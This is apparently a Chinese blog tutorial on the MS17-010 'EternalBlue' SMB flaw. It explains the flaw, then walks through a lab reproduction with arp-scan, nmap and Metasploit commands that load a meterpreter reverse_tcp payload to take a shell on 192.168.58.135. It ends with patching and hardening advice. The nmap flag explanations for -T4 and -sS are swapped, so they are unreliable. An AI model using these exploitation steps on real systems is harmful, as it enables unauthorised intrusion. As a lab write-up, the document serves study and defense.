ms17-010(永恒之蓝)

2024-05-14 01:20
文章标签 010 ms17 永恒

本文主要是介绍ms17-010(永恒之蓝),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

1.漏洞介绍:

        永恒之蓝(ms17-010)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

1.2影响版本:

        这个漏洞影响了多种Windows系统,包括Windows Vista、Windows 7、Windows 8.1、Windows 10(包括服务器版本如Windows Server 2008、Windows Server 2012等)。特别是那些未启用或未正确配置防火墙、未及时更新补丁的系统,更容易受到攻击。

1.3漏洞原理:

        永恒之蓝漏洞是一种缓冲区溢出漏洞。攻击者可以通过向Windows服务器的SMBv1服务发送精心构造的恶意数据包,导致服务器上的SMB服务崩溃或执行任意代码。这样,攻击者就可能获得对被攻击系统的完全控制权。

1.4漏洞防护:
         微软已于2017 年 发布MS17-010补丁,修复了“永恒之蓝”攻击的系统漏洞,一定要及时更新Windows系统补丁;务必不要轻易打开doc、rtf等后缀的附件;内网中存在使用相同账号、密码情况的机器请尽快修改密码,未开机的电脑请确认口令修改完毕、补丁安装完成后再进行联网操作,可以下载“永恒之蓝”漏洞修复工具进行漏洞修复。

接下来我们开始漏洞复现:

2.信息收集:

2.1.主机扫描:

arp-scan -l

2.2.端口扫描:

nmap -O -T4 -sS 192.168.58.135

      注解:  -O: Nmap进行操作系统识别。它会尝试通过分析目标主机的网络行为和响应来猜测其运行的操作系统类型。

                -T4:启用了TCP SYN扫描(也称为半开放扫描)。在进行端口扫描时,Nmap发送一个TCP SYN包到目标主机上的每个目标端口,如果收到了一个SYN/ACK响应,说明该端口是打开的。

                -sS:4是Nmap的默认设置之一,表示较高的扫描速度和更少的等待时间.

3.漏洞探测:

msfconsole # open msfsearch ms17-010 # 搜寻模块

use 24 # 选择第24个模块

show missing # 查看需要配置哪些信息

这里需要配置被攻击方ip地址:

使用show options选项,查看我们要输入的具体参数,其中标注了yes的选项是必须的参数,若这个参数为空,则需要我们填写。

Run开始攻击:

输出信息提示:该主机可能容易受到攻击(说明该系统存在ms17_010漏洞)

4.漏洞利用:

search ms17-010

use 0 # 选择第0个模块

4.1.设置payload连接的方式,reverse_tcp为反向连接,即受害机主动连接攻击机,以获取shell。

set payload windows/x64/meterpreter/reverse_tcp

4.2.设置靶机ip地址:

set rhosts 192.168.58.135

4.3.开始攻击Run:

成功拿下该主机shell !!!!!

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

最后对于防范MS17-010(也被称为“永恒之蓝”漏洞)的建议,主要有以下几点:

  1. 及时更新系统补丁
    • 这是最直接且有效的防范措施。微软已经针对此漏洞发布了修复补丁,因此建议用户及时从微软官方网站下载并安装这些补丁,以确保系统的安全性。
  2. 禁用SMB v1协议
    • MS17-010漏洞主要利用了SMB v1协议中的漏洞进行攻击,因此禁用SMB v1协议可以显著降低系统被攻击的风险。用户可以通过控制面板的“程序”选项中的“打开或关闭Windows功能”,取消勾选“SMB 1.0/CIFS文件共享支持”来禁用SMB v1协议。
  3. 使用防火墙限制端口
    • 防火墙可以限制SMB协议使用的端口(默认为445端口),只允许指定的IP地址和端口访问SMB服务。这样可以进一步降低系统被未授权访问的风险。
  4. 强化密码策略
    • 使用强密码并定期更改密码是保护系统安全的基本措施。建议用户采用包含大小写字母、数字和特殊字符的复杂密码,并定期更换密码。
  5. 安装杀毒软件
    • 安装杀毒软件可以及时发现并清除病毒文件,防止被黑客利用病毒入侵系统。建议用户选择知名的杀毒软件,并保持其更新到最新版本。
  6. 加强网络安全意识
    • 用户应该加强网络安全意识,不要轻易打开陌生邮件、链接、文件等,避免被黑客利用社会工程学攻击手段入侵系统。
  7. 备份重要数据
    • 定期备份重要数据是防范各种安全威胁的重要措施。即使系统受到攻击,也可以通过恢复备份数据来减少损失。
  8. 使用最新的操作系统和软件
    • 随着技术的不断发展,新的操作系统和软件版本通常包含更多的安全特性和修复了已知的安全漏洞。因此,建议用户尽量使用最新的操作系统和软件版本。

这篇关于ms17-010(永恒之蓝)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/987350

相关文章

【百日算法计划】:每日一题,见证成长(010)

题目 合并两个排序的链表 输入两个递增排序的链表,合并这两个链表并使新链表中的节点仍然是递增排序的 示例1: 输入:1->2->4, 1->3->4 输出:1->1->2->3->4->4 思路 引入一个带虚拟头结点和tail指针的结果链表,把原节点的值比较大小后加入到结果链表中。 public ListNode mergeTwoLists(ListNode l1, ListNo

Kali-MSF-永恒之蓝漏洞复现(ms17_010_eternalblue)

目录 一、漏洞利用 1.主机发现 2.msf拿取shell 3.获取屏幕 4.文件上传 5.文件下载 6.远程登录 7.上传后门 nc利用 法一:目标主动(推荐) 法二:目标被动(该方法需要msf协助,有点本末倒置) 8.免杀 9.清除日志 二、预防策略 1.打开防火墙 2.安装杀毒软件 3.禁用445端口 使用防火墙新增规则,禁用端口 关闭server服务

永恒之蓝漏洞复现记录

准备工作 实验环境搭建 下载并安装VMware Workstation软件查看VMware的虚拟网卡和虚拟网络设置安装Windows虚拟机镜像和Kali linux虚拟机镜像 实验目的 掌握Windows网络服务远程渗透攻击基本理论知识。掌握Windows漏洞及漏洞利用方法原理。掌握Windows网络服务远程渗透攻击防范措施。了解渗透测试软件Metasploit并掌握操作使用Metaspl

康托尔、哥德尔、图灵——永恒的金色对角线(转载)

我看到了它,却不敢相信它。 ——康托尔 哥德尔的不完备性定理震撼了20世纪数学界的天空,其数学意义颠覆了希尔伯特的形式化数学的宏伟计划,其哲学意义直到21世纪的今天仍然不断被延伸到各个自然学科,深刻影响着人们的思维。图灵为了解决希尔伯特著名的第十问题而提出有效计算模型,进而作出了可计算理论和现代计算机的奠基性工作,著名的停机问题给出了机械计算模型的能力极限,其深刻的意义和漂

【安当产品应用案例100集】010-基于国密UKEY的信封加密应用案例

安当有个客户开发了一套C/S架构的软件,Server在云端,Client由不同的用户使用。最初软件设计开发的时候,没有考虑数据安全形势日渐严峻的问题,Server端和Client端直接就建立一个socket连接来进行通信,Server端发出去的数据还涉及到一些敏感字段和指令,随着越来越多的用户开始关注安全问题,这个安全架构显然已经不满足最基本的数据安全要求。 由于Client端数量较多,客户

133-横向移动域控提权NetLogonADCSPACKDC永恒之蓝

除了前面讲到的口令密码进行横向移动,还存在使用系统漏洞进行的横向移动的方式,本节课就是讲一些域内系统的漏洞,主要是域控提权的一些漏洞 1、横向移动-系统漏洞-CVE-2017-0146(ms17-010,永恒之蓝) 2、横向移动-域控提权-CVE-2014-6324 3、横向移动-域控提权-CVE-2020-1472(重点) 4、 横向移动-域控提权-CVE-2021-42287(重点)

MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法

目录 一、漏洞简介 漏洞原理 影响版本 二、漏洞复现 三、复现过程 1、扫描局域网内的C段主机(主机发现) 扫描结果: 2.使用MSF的永恒之蓝漏洞模块 3.对主机进行扫描,查看其是否有永恒之蓝漏洞 4.准备攻击 四、漏洞利用 五、提升权限 1.创建新用户 2.将用户添加至管理员群组 3.查看端口的开启情况 六、远程登录 七、漏洞修复 一、漏洞简介 永

PAT-L1-010. 比较大小

L1-010. 比较大小 时间限制 400 ms 内存限制 65536 kB 代码长度限制 8000 B 判题程序 Standard 作者 杨起帆(浙江大学城市学院) 本题要求将输入的任意3个整数从小到大输出。 输入格式: 输入在一行中给出3个整数,其间以空格分隔。 输出格式: 在一行中将3个整数从小到大输出,其间以“->”相连。 输入样例

meterpeter基础及永恒之蓝漏洞利用

meterpeter基础知识 meterpeter为渗透测试框架,主要用于后渗透模块 后渗透:拿到shell后进行的操作(远程,权限维持,入侵痕迹清除,上机关闭杀毒软件) msf能干什么 相当于一个漏洞库(信息收集,漏洞检测,漏洞利用,payload,shellcode:攻击载荷,poc,exp,病毒木马文件生成) 前提:已知软件漏洞,专业漏洞攻击工具 一般用来打nday(例:永恒之蓝,心脏

Java笔试面试题010

1、说说下面语句是否有错误,或可能出现的缺陷,并指出错误,或缺陷在哪里? public class MyFile implements Runnable{        public voidrun(){               while(true){                      try{                             FileReader